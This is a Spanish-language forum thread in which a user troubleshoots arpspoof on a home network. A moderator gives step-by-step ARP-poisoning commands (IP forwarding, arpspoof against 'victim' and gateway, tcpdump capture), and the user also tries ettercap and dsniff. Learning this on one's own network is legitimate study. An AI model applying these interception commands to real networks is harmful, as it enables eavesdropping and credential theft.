Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?
02-Diciembre 20:58:08 (Martes)
Inicio Ayuda Ingresar Registrarse


+  Seguridad Wireless
|-+  Suite Seguridad Wireless
| |-+  Live CD Wifislax (Moderadores: ChimoC, the_often, chinitiw)
| | |-+  Problema para usar arpspoof		 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 Imprimir
Autor Tema: Problema para usar arpspoof  (Leído 1563 veces)
ds2wn
*
Desconectado Desconectado

Mensajes: 7
« en: 30-Mayo 19:56:13 (Mircoles) »
Hola a todos, intentando usar el arpspoof en la red de mi casa tengo problemas y no se si es por que me equivoco en alguna cosa o me falta algun comando, para situar un poco la escena explicare que tengo un ordenador con ip interna 192.162.1.46, el router con ip 192.168.1.1 y mi portatil en la que uso la interfaz ath0 con ip 192.168.1.34 lo que hago es lo siguiente:

wifislax ~ # echo 1 > /proc/sys/net/ipv4/ip_forward
wifislax ~ # arpspoof -i ath0 -t 192.168.1.46 192.168.1.1
wifislax ~ # arpspoof -i ath0 -t 192.168.1.46 192.168.1.1
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host
wifislax ~ #

tambien he probado esto:

wifislax ~ # arpspoof -i ath0 -t 192.168.1.46 192.168.1.1 & arpspoof -t 192.168.1.1 192.168.1.46
[1] 15323
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host
arpspoof: couldn't arp for host 192.168.1.1
[1]+  Exit 1                  arpspoof -i ath0 -t 192.168.1.46 192.168.1.1
wifislax ~ #

No se en que fallo tambien es la primera vez que intento hacer uso del dsniff y todas sus opciones, cualquier ayuda estaria muy agradecido. Gracias de antemano!
En línea
ANELKAOS
Moderador Global
******
Desconectado Desconectado

Mensajes: 190



WWW
« Respuesta #1 en: 31-Mayo 03:05:01 (Jueves) »
Hola ds2wm

Esto es un experimento muy sencillo si te lo explican bien, sin entrar en tecnicismos de tablas ARP, consiste en suplantar dos direcciones mac de dos dispositivos de tu red desde 'X'. En primer lugar hacemos el spoofing de la mac de la puerta de enlace diciéndole a 'V' que todos los paquetes que quiera mandar a 'G' te los mande a ti, que eres 'X'. En segundo le dices a 'G' que tu eres 'V' así que sus paquetes debe enviártelos a ti 'X'. Engañas a 192.168.1.46 diciéndole que la puerta de enlace 'G' eres tu, 'X'. En segundo, le dices a la puerta de enlace que tu eres 'V'.

A 'V' le dices que 'G' es 'X'
A 'G' le cuentas que 'V' es 'X'
Todos quieren a X Cheesy

Repetimos....
En 'X' levantas la tarjeta y habilita el forwarding con:
wifislax ~ # echo 1 > /proc/sys/net/ipv4/ip_forward

Envenenas a la victima diciendole que tu eres la puerta de enlace:
wifislax ~ # arpspoof -t 192.168.1.46 192.168.1.1
arpspoof -t V G

Abres otra consola y envenenas a la puerta de enlace diciéndole que tu eres 'victima':
wifislax ~ # arpspoof -t 192.168.1.1 192.168.1.46
arpspoof -t G V

Asegurate de que todo funciona perfectamente con:
wifislax ~ # tcpdump -l -n tcp -A -s 128

En esta película han participado:
G : Puerta de enlace o gateway 192.168.1.1
V : Victima                                   192.168.1.46
X: Los malos  Cheesy                          192.168.1.69
En línea
rh3nt0n
Administrador
*
Desconectado Desconectado

Mensajes: 1133


" si, vis pacem , para bellum "
« Respuesta #2 en: 31-Mayo 12:12:16 (Jueves) »
Cita de: ANELKAOS en 31-Mayo 03:05:01  (Jueves)
Hola ds2wm

Esto es un experimento muy sencillo si te lo explican bien, sin entrar en tecnicismos de tablas ARP, consiste en suplantar dos direcciones mac de dos dispositivos de tu red desde 'X'. En primer lugar hacemos el spoofing de la mac de la puerta de enlace diciéndole a 'V' que todos los paquetes que quiera mandar a 'G' te los mande a ti, que eres 'X'. En segundo le dices a 'G' que tu eres 'V' así que sus paquetes debe enviártelos a ti 'X'. Engañas a 192.168.1.46 diciéndole que la puerta de enlace 'G' eres tu, 'X'. En segundo, le dices a la puerta de enlace que tu eres 'V'.

A 'V' le dices que 'G' es 'X'
A 'G' le cuentas que 'V' es 'X'
Todos quieren a X Cheesy

Repetimos....
En 'X' levantas la tarjeta y habilita el forwarding con:
wifislax ~ # echo 1 > /proc/sys/net/ipv4/ip_forward

Envenenas a la victima diciendole que tu eres la puerta de enlace:
wifislax ~ # arpspoof -t 192.168.1.46 192.168.1.1
arpspoof -t V G

Abres otra consola y envenenas a la puerta de enlace diciéndole que tu eres 'victima':
wifislax ~ # arpspoof -t 192.168.1.1 192.168.1.46
arpspoof -t G V

Asegurate de que todo funciona perfectamente con:
wifislax ~ # tcpdump -l -n tcp -A -s 128

En esta película han participado:
G : Puerta de enlace o gateway 192.168.1.1
V : Victima                                   192.168.1.46
X: Los malos  Cheesy                          192.168.1.69

No eres peliculero tu ni na ...  Grin Grin Grin Grin

para mi esta claro. Wink
saludos
En línea
"No se trata de romper ventanas ni farolas... ni de cara; mejor romper conciencias equivocadas"
ds2wn
*
Desconectado Desconectado

Mensajes: 7
« Respuesta #3 en: 31-Mayo 16:26:57 (Jueves) »
Gracias por la explicación, solo me han faltado las palomitas  Grin Grin
Pero sigo teniendo el problema ya que mi explicacion no es que haya sido muy precisa Embarrassed, asi que comenzare de nuevo.
Tengo una pcmcia orinoco gold 802.11b/g, al conectarme a mi red y intentar usar el arpspoof me pasa lo siguiente:

wifislax ~ # echo 1 > /proc/sys/net/ipv4/ip_forward

wifislax ~ # arpspoof -i ath0 -t 192.168.1.46 192.168.1.1
Version: 2.4
Usage: arpspoof [-i interface] [-t target] host
wifislax ~ #

wifislax ~ # arpspoof -i ath0 -t 192.168.1.1 192.168.1.46
arpspoof: couldn't arp for host 192.168.1.1
wifislax ~ #

Al intentar hacer spoofing la primera vez el programa no hace nada y me vuelve a la linea de comandos, a la segunda me sale que no puede hacerlo y me vuelve a mandar a la linea de comandos.. Tambien he intentado hacerlo con ettercap y aqui es donde me he comenzado a llevar sorpresas:

wifislax ~ # ettercap ath0 -Tq -M arp:remote /192.168.1.46/ /192.168.1.1/

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

TARGET (ath0) contains invalid chars !

wifislax ~ #

No entiendo por que ha salido lo de: TARGET (ath0) contains invalid chars ! Bueno entonces lo pruebo sin ponerle el ath0 y automaticamente se me pone en wifi0 pero la interfaz de wifi0 la tengo desabilitada y no se como ponerla para que vaya:

wifislax ~ # iwconfig wifi0
wifi0     no wireless extensions.

Igualmente todos los programas del paquete dsniff directamente utilizan la interfaz de wifi0, ettercap tambien:

wifislax ~ # dsniff
dsniff: listening on wifi0

y si intento hacerlo desde ath0 me sale lo siguiente:

wifislax ~ # dsniff ath0
dsniff: nids_init:
wifislax ~ #

Si intento hacer el arpspoof desde wifi0 logicamente me dice q no se puede ya que esta caida y me sale esto:

wifislax ~ # arpspoof -i wifi0 -t 192.168.1.1 192.168.1.46
arpspoof: Error in init libnet |libnet_select_device(): Can't find interface wifi0
|
wifislax ~ #

Y mis preguntas son las siguientes, como puedo hacer para activar la interfaz de wifi0? Se puede tocar la libreria de init algun parametro que sea por lo que falla al intentar hacerlo con la ath0? O a lo mejor le estoy dando muchas vueltas y en si es una tonteria pero es que llevo poco con linux y nos estamos comenzando a conocer y no nos llevamos del todo bien, cualquier ayuda estaria muy agradecido. Gracias de antemano.
En línea
ds2wn
*
Desconectado Desconectado

Mensajes: 7
« Respuesta #4 en: 31-Mayo 17:39:49 (Jueves) »
Bueno ya esta solucionado el problema pero usando ettercap en vez de arpspoof y ya me funcionan todos los programas del paquete del dsniff con la interfaz ath0. Gracias por la ayuda y la explicación ANELKAOS  Wink
En línea
Páginas: 1 Imprimir 
« anterior próximo »
Ir a:  

Powered by SMF 1.1.7 | SMF © 2006, Simple Machines LLC
Consejos publicitarios

Cheap Electricity - Cheap Gas - Renegade Motorhomes - Loans